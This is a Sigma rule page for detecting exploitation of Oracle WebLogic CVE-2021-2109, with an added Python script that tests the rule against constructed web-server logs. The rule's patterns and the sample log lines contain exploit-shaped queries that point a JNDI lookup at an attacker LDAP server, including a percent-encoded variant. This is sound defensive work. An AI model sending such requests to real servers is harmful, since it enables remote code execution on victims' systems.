Oracle WebLogic Exploit CVE-2021-2109
Detects the exploitation of the WebLogic server vulnerability described in CVE-2021-2109
Sigma rule

```yaml
title: Oracle WebLogic Exploit CVE-2021-2109
id: 687f6504-7f44-4549-91fc-f07bab065821
status: test
description: Detects the exploitation of the WebLogic server vulnerability described in CVE-2021-2109
references:
    - https://twitter.com/pyn3rd/status/1351696768065409026
    - https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw
author: Bhabesh Raj
date: 2021/01/20
modified: 2023/01/02
tags:
    - attack.t1190
    - attack.initial_access
    - cve.2021.2109
    - detection.emerging_threats
logsource:
    category: webserver
detection:
    selection:
        cs-method: 'GET'
        cs-uri-query|contains|all:
            - 'com.bea.console.handles.JndiBindingHandle'
            - 'ldap://'
            - 'AdminServer'
    condition: selection
fields:
    - c-ip
    - c-dns
falsepositives:
    - Unknown
level: critical
```
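The following is an added example, not part of the Sigma rule or the page, that replays the rule's `selection` over a few constructed W3C extended log records (the `cs-method`, `cs-uri-query` and `c-ip` field names that Sigma's `webserver` category maps to; the `#Fields` order, the IPs and the request lines are all made up for this demo). Sigma `contains` matching is case-insensitive, so the comparison is lower-cased. A `decode_query` switch, which goes beyond the rule as written, percent-decodes the query string before matching so that an encoded `ldap%3A%2F%2F` is not missed.

```python
"""Replay the Sigma selection above against W3C extended log lines.

Added example, not code from the Sigma rule or the page. Field names
follow the W3C extended log format (cs-method, cs-uri-query, c-ip) that
Sigma's `webserver` category maps to. Sample lines are constructed.
"""
from urllib.parse import unquote

# Indicators copied from the rule's selection. Sigma `contains` is
# case-insensitive, so everything is compared lower-cased below.
REQUIRED_METHOD = "GET"
REQUIRED_SUBSTRINGS = (
    "com.bea.console.handles.JndiBindingHandle",
    "ldap://",
    "AdminServer",
)

# Constructed W3C extended log excerpt; the #Fields order is an assumption.
# Record 1: exploit-shaped GET (should fire).
# Record 2: ordinary console login (should not fire).
# Record 3: same query but POST (rule requires GET, should not fire).
# Record 4: same query percent-encoded (rule as written misses it).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2021-01-20 10:00:01 192.0.2.10 GET /console/consolejndi.portal handle=com.bea.console.handles.JndiBindingHandle("ldap://192.0.2.10:1389/a;AdminServer") 200
2021-01-20 10:00:02 198.51.100.7 GET /console/login/LoginForm.jsp - 200
2021-01-20 10:00:03 192.0.2.10 POST /console/consolejndi.portal handle=com.bea.console.handles.JndiBindingHandle("ldap://192.0.2.10:1389/a;AdminServer") 200
2021-01-20 10:00:04 192.0.2.11 GET /console/consolejndi.portal handle=com.bea.console.handles.JndiBindingHandle(%22ldap%3A%2F%2F192.0.2.11%3A1389%2Fa%3BAdminServer%22) 200
"""


def parse_w3c(text):
    """Yield one dict per record, keyed by the names on the #Fields line."""
    fields = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or fields is None:
            continue  # other directives, or data before any #Fields header
        # Split into exactly len(fields) columns; the last one absorbs any rest.
        values = line.split(" ", len(fields) - 1)
        yield dict(zip(fields, values))


def selection_matches(record, decode_query=False):
    """Apply the rule's `selection`: GET plus all three substrings in cs-uri-query.

    decode_query=False reproduces the rule as written (raw query string).
    decode_query=True is an added hardening, not part of the rule: percent-
    decode first so an encoded `ldap%3A%2F%2F` still matches `ldap://`.
    """
    if record.get("cs-method", "").upper() != REQUIRED_METHOD:
        return False
    query = record.get("cs-uri-query", "")
    if decode_query:
        query = unquote(query)
    query = query.lower()
    return all(s.lower() in query for s in REQUIRED_SUBSTRINGS)


def matching_ips(text, decode_query=False):
    """Return the c-ip of every record the selection fires on, in log order."""
    return [r["c-ip"] for r in parse_w3c(text) if selection_matches(r, decode_query)]


if __name__ == "__main__":
    print("rule as written:      ", matching_ips(SAMPLE_LOG))
    print("with percent-decoding:", matching_ips(SAMPLE_LOG, decode_query=True))
```

Two caveats worth keeping in mind when deploying the rule: the three indicators are matched against the query string exactly as the web server logged it, so if the server records percent-encoded queries the `ldap://` indicator will only match once the value is decoded (the `decode_query` path above, or a normalisation step in the SIEM); and `AdminServer` is WebLogic's default administration server name, so a domain whose admin server has been renamed needs that indicator adjusted.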
Related rules
- CVE-2010-5278 Exploitation Attempt
- CVE-2020-0688 Exchange Exploitation via Web Log
- CVE-2020-0688 Exploitation Attempt
- CVE-2020-10148 SolarWinds Orion API Auth Bypass
- CVE-2020-5902 F5 BIG-IP Exploitation Attempt